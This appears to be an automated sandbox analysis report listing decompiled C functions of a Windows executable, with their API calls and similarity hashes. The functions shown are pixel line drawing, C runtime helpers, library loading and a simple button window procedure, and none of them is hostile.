                                              • GetPixel.GDI32(?,?,?), ref: 002FB6A2
                                              • GetPixel.GDI32(?,?,?), ref: 002FB714
                                              • GetPixel.GDI32(?,?,?), ref: 002FB77F
                                              • GetPixel.GDI32(?,00000002,?), ref: 002FB7E9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Pixel
                                              • String ID:
                                              • API String ID: 3195210534-0
                                              • Opcode ID: 2dc2cb511149c18bf997bf798e3da9303b98d1534867cc9ef9053b7d7ff87a04
                                              • Instruction ID: 84eee227279c03e216b0146c3de50c88661ca7c9e1f35c8677ee7137d04025a6
                                              • Opcode Fuzzy Hash: 2dc2cb511149c18bf997bf798e3da9303b98d1534867cc9ef9053b7d7ff87a04
                                              • Instruction Fuzzy Hash: 16C182B5A1410DAFCF05CF98D991DEFB7BABB88380F208558F619E7244D730A951CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E002FBE50(signed int __edx, struct HDC__* _a4, void* _a8, void* _a12, signed int _a16, signed int _a20, long _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                              				intOrPtr _v8;
                                              				int _v12;
                                              				int _v16;
                                              				int _v20;
                                              				int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				intOrPtr _v36;
                                              				intOrPtr _v40;
                                              				intOrPtr _v44;
                                              				int _t144;
                                              				int _t166;
                                              				signed int _t220;
                                              				signed int _t237;
                                              
                                              				asm("cdq");
                                              				asm("cdq");
                                              				if((_a16 - _a8 ^ __edx) - __edx >= (_a20 - _a12 ^ __edx) - __edx) {
                                              					if(_a8 > _a16) {
                                              						E002FC490( &_a8,  &_a8,  &_a16);
                                              						E002FC490( &_a8,  &_a12,  &_a20);
                                              					}
                                              					_v20 = _a12;
                                              					_t237 = _a20;
                                              					if(_t237 <= _a12) {
                                              						_v40 = 0xffffffff;
                                              					} else {
                                              						_v40 = 1;
                                              					}
                                              					_v36 = _v40;
                                              					_v32 = _a16 - _a8;
                                              					asm("cdq");
                                              					_v28 = (_a20 - _a12 ^ _t237) - _t237;
                                              					_v8 = (_v28 << 1) - _v32;
                                              					_t166 = _a8;
                                              					_v12 = _t166;
                                              					while(_v12 <= _a16) {
                                              						if(_a32 != 0) {
                                              							if(_a36 != 0) {
                                              								E002FC390(_v12, _a28, _v12, _v20, 0xffffff - GetPixel(_a4, _v12, _v20), _a24);
                                              							} else {
                                              								E002FC390(_v20, _a28, _v12, _v20, GetPixel(_a4, _v12, _v20), _a24);
                                              							}
                                              						}
                                              						SetPixel(_a4, _v12, _v20, _a24);
                                              						if(_v8 <= 0) {
                                              							_t166 = _v8;
                                              							_v8 = _t166 + _v28 * 2;
                                              						} else {
                                              							_v20 = _v20 + _v36;
                                              							_t166 = _v8;
                                              							_v8 = _t166 + (_v28 - _v32) * 2;
                                              						}
                                              						_v12 = _v12 + 1;
                                              					}
                                              					return _t166;
                                              				}
                                              				if(_a12 > _a20) {
                                              					E002FC490( &_a8,  &_a8,  &_a16);
                                              					E002FC490( &_a8,  &_a12,  &_a20);
                                              				}
                                              				_v24 = _a8;
                                              				_t220 = _a16;
                                              				if(_t220 <= _a8) {
                                              					_v44 = 0xffffffff;
                                              				} else {
                                              					_v44 = 1;
                                              				}
                                              				_v36 = _v44;
                                              				asm("cdq");
                                              				_v32 = (_a16 - _a8 ^ _t220) - _t220;
                                              				_v28 = _a20 - _a12;
                                              				_v8 = (_v32 << 1) - _v28;
                                              				_t144 = _a12;
                                              				_v16 = _t144;
                                              				while(_v16 <= _a20) {
                                              					if(_a32 != 0) {
                                              						if(_a36 != 0) {
                                              							E002FC390(_v24, _a28, _v24, _v16, 0xffffff - GetPixel(_a4, _v24, _v16), _a24);
                                              						} else {
                                              							E002FC390(_v16, _a28, _v24, _v16, GetPixel(_a4, _v24, _v16), _a24);
                                              						}
                                              					}
                                              					SetPixel(_a4, _v24, _v16, _a24);
                                              					if(_v8 <= 0) {
                                              						_t144 = _v8;
                                              						_v8 = _t144 + _v32 * 2;
                                              					} else {
                                              						_v24 = _v24 + _v36;
                                              						_t144 = _v8;
                                              						_v8 = _t144 + (_v32 - _v28) * 2;
                                              					}
                                              					_v16 = _v16 + 1;
                                              				}
                                              				return _t144;
                                              			}


                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Pixel
                                              • String ID:
                                              • API String ID: 3195210534-0
                                              • Opcode ID: 6b6753c74ed91656936779d769e3e57e52ab650e99f8c92b68de4e2b899f9a12
                                              • Instruction ID: 6a785ede1eba339b2014bad133933df3fb7f348c7f212a7d292d23856202fccb
                                              • Opcode Fuzzy Hash: 6b6753c74ed91656936779d769e3e57e52ab650e99f8c92b68de4e2b899f9a12
                                              • Instruction Fuzzy Hash: 03A1B775A1010EEFCF04CFA8C9949EEB7B6BF48340F208659FA15A7254D734AA51CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 72%
                                              			// Lookup-or-create of a per-thread block: the slot index at 0x304044 is used by E002F516B to fetch an
                                              			// existing block; if none exists, a zeroed 0x364-byte block is allocated and stored. E002F36E4 is _abort
                                              			// (see the APIs below), so this variant terminates the process when no block can be obtained. The
                                              			// asm("int3") marks the end of this function; the decompiler has merged the next function (same
                                              			// lookup-or-create, but returning 0 instead of aborting) into this listing.
                                              			E002F3BE2(void* __ebx, void* __ecx, void* __edx) {
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr _t2;
                                              				void* _t3;
                                              				void* _t4;
                                              				intOrPtr _t9;
                                              				void* _t11;
                                              				void* _t20;
                                              				void* _t21;
                                              				void* _t23;
                                              				void* _t25;
                                              				void* _t27;
                                              				void* _t29;
                                              				void* _t31;
                                              				void* _t32;
                                              				long _t36;
                                              				long _t37;
                                              				void* _t40;
                                              
                                              				_t29 = __edx;
                                              				_t23 = __ecx;
                                              				_t20 = __ebx;
                                              				_t36 = GetLastError(); // save the caller's last-error value; SetLastError restores it on every exit path
                                              				_t2 =  *0x304044; // 0x7  (slot index; 0xffffffff would mean no slot has been allocated yet)
                                              				_t42 = _t2 - 0xffffffff;
                                              				if(_t2 == 0xffffffff) {
                                              					L2:
                                              					_t3 = E002F3727(_t23, 1, 0x364); // calloc-style allocation: one zeroed block of 0x364 bytes
                                              					_t31 = _t3;
                                              					_pop(_t25);
                                              					if(_t31 != 0) {
                                              						_t4 = E002F51C1(_t25, _t36, __eflags,  *0x304044, _t31); // store the block under the slot; non-zero = stored
                                              						__eflags = _t4;
                                              						if(_t4 != 0) {
                                              							E002F3A54(_t25, _t31, "xE0"); // setup call on the newly stored block
                                              							E002F365C(0); // free(NULL): no effect
                                              							_t40 = _t40 + 0xc;
                                              							__eflags = _t31;
                                              							if(_t31 == 0) {
                                              								goto L9;
                                              							} else {
                                              								goto L8;
                                              							}
                                              						} else {
                                              							_push(_t31); // store failed: release the block, then abort
                                              							goto L4;
                                              						}
                                              					} else {
                                              						_push(_t3); // allocation failed (_t3 == 0): free(NULL), then abort
                                              						L4:
                                              						E002F365C();
                                              						_pop(_t25);
                                              						L9:
                                              						SetLastError(_t36);
                                              						E002F36E4(_t20, _t29, _t31, _t36); // _abort: does not return
                                              						asm("int3"); // padding after the non-returning call; the lines below belong to the next function
                                              						_push(_t20); // prologue of the merged function (ebx, edi, esi)
                                              						_push(_t36);
                                              						_push(_t31);
                                              						_t37 = GetLastError(); // same save/restore of the last-error value as above
                                              						_t21 = 0; // return value: 0 until a block is obtained
                                              						_t9 =  *0x304044; // 0x7
                                              						_t45 = _t9 - 0xffffffff;
                                              						if(_t9 == 0xffffffff) {
                                              							L12:
                                              							_t32 = E002F3727(_t25, 1, 0x364); // same calloc-style allocation
                                              							_pop(_t27);
                                              							if(_t32 != 0) {
                                              								_t11 = E002F51C1(_t27, _t37, __eflags,  *0x304044, _t32);
                                              								__eflags = _t11;
                                              								if(_t11 != 0) {
                                              									E002F3A54(_t27, _t32, "xE0");
                                              									E002F365C(_t21);
                                              									__eflags = _t32;
                                              									if(_t32 != 0) {
                                              										goto L19;
                                              									} else {
                                              										goto L18;
                                              									}
                                              								} else {
                                              									_push(_t32); // store failed: free the block and return 0
                                              									goto L14;
                                              								}
                                              							} else {
                                              								_push(_t21); // allocation failed: free(NULL) and return 0
                                              								L14:
                                              								E002F365C();
                                              								L18:
                                              								SetLastError(_t37);
                                              							}
                                              						} else {
                                              							_t32 = E002F516B(_t25, _t37, _t45, _t9); // fetch the existing block for this slot
                                              							if(_t32 != 0) {
                                              								L19:
                                              								SetLastError(_t37);
                                              								_t21 = _t32; // found (or just created): return the block
                                              							} else {
                                              								goto L12;
                                              							}
                                              						}
                                              						return _t21;
                                              					}
                                              				} else {
                                              					_t31 = E002F516B(_t23, _t36, _t42, _t2); // fetch the existing block for this slot
                                              					if(_t31 != 0) {
                                              						L8:
                                              						SetLastError(_t36);
                                              						return _t31;
                                              					} else {
                                              						goto L2; // nothing stored yet: allocate one
                                              					}
                                              				}
                                              			}

                                              Instruction addresses per decompiled line: 0x002f3be2 to 0x002f3cea (0x00000000 marks lines with no instruction of their own).

                                              APIs
                                              • GetLastError.KERNEL32(?,?,002F3631,00302EE8,0000000C,002F1767), ref: 002F3BE6
                                              • SetLastError.KERNEL32(00000000), ref: 002F3C4E
                                              • SetLastError.KERNEL32(00000000), ref: 002F3C5A
                                              • _abort.LIBCMT ref: 002F3C60
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ErrorLast$_abort
                                              • String ID: xE0
                                              • API String ID: 88804580-242510614
                                              • Opcode ID: 90fce05cf2361d9775bc9f0dac523b89fbd8116222fc3253ece204ca4f1a7e5f
                                              • Instruction ID: fd68f21a4895db3324e63b5639dc0b848790f6fba8b2d7fa8b8003bbf98aeb51
                                              • Opcode Fuzzy Hash: 90fce05cf2361d9775bc9f0dac523b89fbd8116222fc3253ece204ca4f1a7e5f
                                              • Instruction Fuzzy Hash: 31F0D676120A0AA6D612B6247D09B3BE6698BC1BF4B210036F704F22A2DE61CA258964
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			// Window procedure: _a4 = hWnd, _a8 = message, _a12 = wParam, _a16 = lParam.
                                              			E002FD5A0(void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				int _v8;
                                              
                                              				_v8 = _a8; // message id
                                              				if(_v8 == 1) { // WM_CREATE: add a single child control
                                              					// class "button", caption at 0x304a38 (text not shown in the dump), style 0x50000000 = WS_CHILD | WS_VISIBLE,
                                              					// position (0x32, 0x32), size 0x50 x 0x19, parent _a4, control id 1
                                              					CreateWindowExW(0, L"button", 0x304a38, 0x50000000, 0x32, 0x32, 0x50, 0x19, _a4, 1, 0, 0);
                                              				} else {
                                              					if(_v8 == 0x10) { // WM_CLOSE
                                              						DestroyWindow(_a4);
                                              					} else {
                                              						if(_v8 == 0x111) { // WM_COMMAND: the control id in wParam is not checked, so any command (a click on the button included) destroys the window
                                              							DestroyWindow(_a4);
                                              						}
                                              					}
                                              				}
                                              				return DefWindowProcW(_a4, _a8, _a12, _a16); // default handling for every message, including the ones handled above
                                              			}

                                              Instruction addresses per decompiled line: 0x002fd5a7 to 0x002fd61b.

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Window$Destroy$CreateProc
                                              • String ID: button
                                              • API String ID: 3790344893-973515837
                                              • Opcode ID: 63ed79ee088aecf3b6efbbc68fe3f5ffb85948c6cba8564295eb1f24e7b244d7
                                              • Instruction ID: d42274ceb8a78e03b9c3b28fdde1f1b11fd51a4b9bca436c82d9702403315367
                                              • Opcode Fuzzy Hash: 63ed79ee088aecf3b6efbbc68fe3f5ffb85948c6cba8564295eb1f24e7b244d7
                                              • Instruction Fuzzy Hash: 7F0140B529020CFBDB14CF54DC5EFAAB769AB08785F508118FB099B2D0C6B09E10DB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,002F2E41,00000003,?,002F2DE1,00000003,00302E60,0000000C,002F2F38,00000003,00000002), ref: 002F2EB0
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002F2EC3
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,002F2E41,00000003,?,002F2DE1,00000003,00302E60,0000000C,002F2F38,00000003,00000002,00000000), ref: 002F2EE6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: 5c649f52ed6c3203a98318a1b517c7364a73057f365f33bbef307f7eec96961c
                                              • Instruction ID: 07f7f2434e329cbd8d30b1d3cb5b761a2a893577e36cb5a14272e31944ed56ba
                                              • Opcode Fuzzy Hash: 5c649f52ed6c3203a98318a1b517c7364a73057f365f33bbef307f7eec96961c
                                              • Instruction Fuzzy Hash: DAF0813191111DBBDF129F91DC0DBBEBFA8EF04791F020078EA06A2160DB705E64CA91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 81%
                                              			// C runtime helper (the APIs below resolve its subcalls to __alloca_probe_16 and __freea in LIBCMT):
                                              			// converts the narrow string _a12/_a16 to UTF-16 in a temporary buffer and calls GetStringTypeW on it.
                                              			// _a8 = info type, _a12/_a16 = source string and length, _a20 = output type array,
                                              			// _a24 = code page (0 = take the default filled in by E002F3784), _a28 != 0 = reject invalid characters.
                                              			// The temporary buffer is taken from the stack when small and from the heap when large; an 8-byte
                                              			// header tagged 0xcccc (stack) or 0xdddd (heap) lets E002F5CC8 (__freea) decide whether to free it.
                                              			E002F5BAB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                              				signed int _v8;
                                              				int _v12;
                                              				char _v16;
                                              				intOrPtr _v24;
                                              				char _v28;
                                              				void* _v40;
                                              				signed int _t34;
                                              				signed int _t40;
                                              				int _t46;
                                              				int _t53;
                                              				void* _t55;
                                              				int _t57;
                                              				signed int _t63;
                                              				int _t67;
                                              				short* _t69;
                                              				signed int _t70;
                                              				short* _t71;
                                              
                                              				_t34 =  *0x304018; // 0x9021af28  (stack cookie: XORed with the frame pointer here, checked by E002F19D1 on return)
                                              				_v8 = _t34 ^ _t70;
                                              				E002F3784(__ebx,  &_v28, __edx, _a4); // fills the _v28.._v16 structure (default code page at _v24 + 8, flag in _v16)
                                              				_t57 = _a24;
                                              				if(_t57 == 0) {
                                              					_t53 =  *(_v24 + 8); // default code page
                                              					_t57 = _t53;
                                              					_a24 = _t53;
                                              				}
                                              				_t67 = 0; // function result: 0 until GetStringTypeW succeeds
                                              				// size pass: flags 1 = MB_PRECOMPOSED, plus 8 = MB_ERR_INVALID_CHARS when _a28 != 0; NULL output buffer returns the wide-char count
                                              				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                              				_v12 = _t40;
                                              				if(_t40 == 0) {
                                              					L15:
                                              					if(_v16 != 0) {
                                              						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd; // clear the bit set up by E002F3784
                                              					}
                                              					return E002F19D1(_v8 ^ _t70); // cookie check; the result in _t67 is returned in a register the decompiler does not show here
                                              				}
                                              				_t55 = _t40 + _t40; // byte size of the wide buffer (two bytes per wide char)
                                              				_t17 = _t55 + 8; // 0x8  (plus the 8-byte tag header in front of the buffer)
                                              				asm("sbb eax, eax"); // carry-based overflow guard: the masked size becomes 0 if the computation wrapped
                                              				if((_t17 & _t40) == 0) {
                                              					_t69 = 0; // guard tripped: no buffer, conversion is skipped
                                              					L11:
                                              					if(_t69 != 0) {
                                              						E002F1D00(_t67, _t69, _t67, _t55); // called with (_t69, value 0, size _t55): a memset-style clear of the buffer (inferred from the arguments)
                                              						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12); // conversion pass (MB_PRECOMPOSED) into the buffer
                                              						if(_t46 != 0) {
                                              							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                              						}
                                              					}
                                              					L14:
                                              					E002F5CC8(_t69); // __freea: reads the tag below the pointer and frees only a heap-tagged block
                                              					goto L15;
                                              				}
                                              				_t20 = _t55 + 8; // 0x8
                                              				asm("sbb eax, eax");
                                              				_t48 = _t40 & _t20;
                                              				_t21 = _t55 + 8; // 0x8
                                              				_t63 = _t21;
                                              				if((_t40 & _t20) > 0x400) { // more than 1024 bytes: allocate on the heap
                                              					asm("sbb eax, eax");
                                              					_t69 = E002F3696(_t63, _t48 & _t63); // heap allocation (RtlAllocateHeap, per the subcall note in the APIs)
                                              					if(_t69 == 0) {
                                              						goto L14;
                                              					}
                                              					 *_t69 = 0xdddd; // tag: block lives on the heap, __freea must release it
                                              					L9:
                                              					_t69 =  &(_t69[4]); // skip the 8-byte header (4 shorts); this is the buffer handed to MultiByteToWideChar
                                              					goto L11;
                                              				}
                                              				asm("sbb eax, eax");
                                              				E002FA3A0(); // __alloca_probe_16: small request served from the stack
                                              				_t69 = _t71; // adjusted stack pointer = start of the stack buffer
                                              				if(_t69 == 0) {
                                              					goto L14;
                                              				}
                                              				 *_t69 = 0xcccc; // tag: block lives on the stack, nothing for __freea to release
                                              				goto L9;
                                              			}

                                              Instruction addresses per decompiled line: 0x002f5bb3 to 0x002f5cc7 (0x00000000 marks lines with no instruction of their own).

                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 002F5BF8
                                              • __alloca_probe_16.LIBCMT ref: 002F5C30
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002F5C81
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 002F5C93
                                              • __freea.LIBCMT ref: 002F5C9C
                                                • Part of subcall function 002F3696: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,002F381C,?,00000000,?,002F60CD,?,00000004,00000000,?,?,?,002F3361), ref: 002F36C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                              • String ID:
                                              • API String ID: 313313983-0
                                              • Opcode ID: 994da4771ba85c6474a5b7d6ca759115d108b2da80b91d4c18234df2f4d6585c
                                              • Instruction ID: b9b839e41c67eb9019fc458c797dbe0ee4b36f643feb935d798e018a001ab979
                                              • Opcode Fuzzy Hash: 994da4771ba85c6474a5b7d6ca759115d108b2da80b91d4c18234df2f4d6585c
                                              • Instruction Fuzzy Hash: BB31E272A2061EABCF258F64DC85DBEBBA5EB40790F050139FE06D6250E735CD60CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E002F3C66(void* __ecx, void* __edx) {
                                              				void* __esi;
                                              				intOrPtr _t2;
                                              				void* _t4;
                                              				void* _t10;
                                              				void* _t11;
                                              				void* _t13;
                                              				void* _t16;
                                              				long _t17;
                                              
                                              				_t11 = __ecx;
                                              				_t17 = GetLastError();
                                              				_t10 = 0;
                                              				_t2 =  *0x304044; // 0x7
                                              				_t20 = _t2 - 0xffffffff;
                                              				if(_t2 == 0xffffffff) {
                                              					L2:
                                              					_t16 = E002F3727(_t11, 1, 0x364);
                                              					_pop(_t13);
                                              					if(_t16 != 0) {
                                              						_t4 = E002F51C1(_t13, _t17, __eflags,  *0x304044, _t16);
                                              						__eflags = _t4;
                                              						if(_t4 != 0) {
                                              							E002F3A54(_t13, _t16, "xE0");
                                              							E002F365C(_t10);
                                              							__eflags = _t16;
                                              							if(_t16 != 0) {
                                              								goto L9;
                                              							} else {
                                              								goto L8;
                                              							}
                                              						} else {
                                              							_push(_t16);
                                              							goto L4;
                                              						}
                                              					} else {
                                              						_push(_t10);
                                              						L4:
                                              						E002F365C();
                                              						L8:
                                              						SetLastError(_t17);
                                              					}
                                              				} else {
                                              					_t16 = E002F516B(_t11, _t17, _t20, _t2);
                                              					if(_t16 != 0) {
                                              						L9:
                                              						SetLastError(_t17);
                                              						_t10 = _t16;
                                              					} else {
                                              						goto L2;
                                              					}
                                              				}
                                              				return _t10;
                                              			}


                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,002F4129,002F383A,?,002F60CD,?,00000004,00000000,?,?,?,002F3361,?,00000000), ref: 002F3C6B
                                              • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 002F3CD4
                                              • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 002F3CDD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID: xE0
                                              • API String ID: 1452528299-242510614
                                              • Opcode ID: 49156b66d3d9024900b61af4487613cc4614e6f04a7d2680b0065f17401a7038
                                              • Instruction ID: c06f9e801c296705a9a37d63bbb087ae6fc6d2ecf5f63a11e47345835957cb60
                                              • Opcode Fuzzy Hash: 49156b66d3d9024900b61af4487613cc4614e6f04a7d2680b0065f17401a7038
                                              • Instruction Fuzzy Hash: 8001DB72260A097BD612E6256D59D7BE55D9BC13F0721003AFB15F3292DE60CB268524
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E002F5044(signed int _a4) {
                                              				signed int _t9;
                                              				void* _t13;
                                              				signed int _t15;
                                              				WCHAR* _t22;
                                              				signed int _t24;
                                              				signed int* _t25;
                                              				void* _t27;
                                              
                                              				_t9 = _a4;
                                              				_t25 = 0x305620 + _t9 * 4;
                                              				_t24 =  *_t25;
                                              				if(_t24 == 0) {
                                              					_t22 =  *(0x2fed58 + _t9 * 4);
                                              					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                              					if(_t27 != 0) {
                                              						L8:
                                              						 *_t25 = _t27;
                                              						if( *_t25 != 0) {
                                              							FreeLibrary(_t27);
                                              						}
                                              						_t13 = _t27;
                                              						L11:
                                              						return _t13;
                                              					}
                                              					_t15 = GetLastError();
                                              					if(_t15 != 0x57) {
                                              						_t27 = 0;
                                              					} else {
                                              						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                              						_t27 = _t15;
                                              					}
                                              					if(_t27 != 0) {
                                              						goto L8;
                                              					} else {
                                              						 *_t25 = _t15 | 0xffffffff;
                                              						_t13 = 0;
                                              						goto L11;
                                              					}
                                              				}
                                              				_t4 = _t24 + 1; // 0x9021af29
                                              				asm("sbb eax, eax");
                                              				return  ~_t4 & _t24;
                                              			}


                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,002F4FEB,00000000,00000000,00000000,00000000,?,002F51E8,00000006,FlsSetValue), ref: 002F5076
                                              • GetLastError.KERNEL32(?,002F4FEB,00000000,00000000,00000000,00000000,?,002F51E8,00000006,FlsSetValue,002FF210,002FF218,00000000,00000364,?,002F3CB4), ref: 002F5082
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002F4FEB,00000000,00000000,00000000,00000000,?,002F51E8,00000006,FlsSetValue,002FF210,002FF218,00000000), ref: 002F5090
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: 833d66b15a193f527897590db42c51858bdd78ff7dd5a149a7736da26a1fdee8
                                              • Instruction ID: 92fd3b9d13aa167ed9e78f9f316cf23fc3ce3dcedf4195c300ef6a34c55a3585
                                              • Opcode Fuzzy Hash: 833d66b15a193f527897590db42c51858bdd78ff7dd5a149a7736da26a1fdee8
                                              • Instruction Fuzzy Hash: EF01DD31621A3BABCB314E68AC48D76B758EF097F17110538FB05D3250DE60D810C6E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F1CB6() {
                                              				void* _t4;
                                              				void* _t8;
                                              
                                              				E002F2317();
                                              				E002F22AB();
                                              				if(E002F2028() != 0) {
                                              					_t4 = E002F1FDA(_t8, __eflags);
                                              					__eflags = _t4;
                                              					if(_t4 != 0) {
                                              						return 1;
                                              					} else {
                                              						E002F2064();
                                              						goto L1;
                                              					}
                                              				} else {
                                              					L1:
                                              					return 0;
                                              				}
                                              			}


                                              APIs
                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 002F1CB6
                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 002F1CBB
                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 002F1CC0
                                                • Part of subcall function 002F2028: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 002F2039
                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 002F1CD5
                                              Memory Dump Source
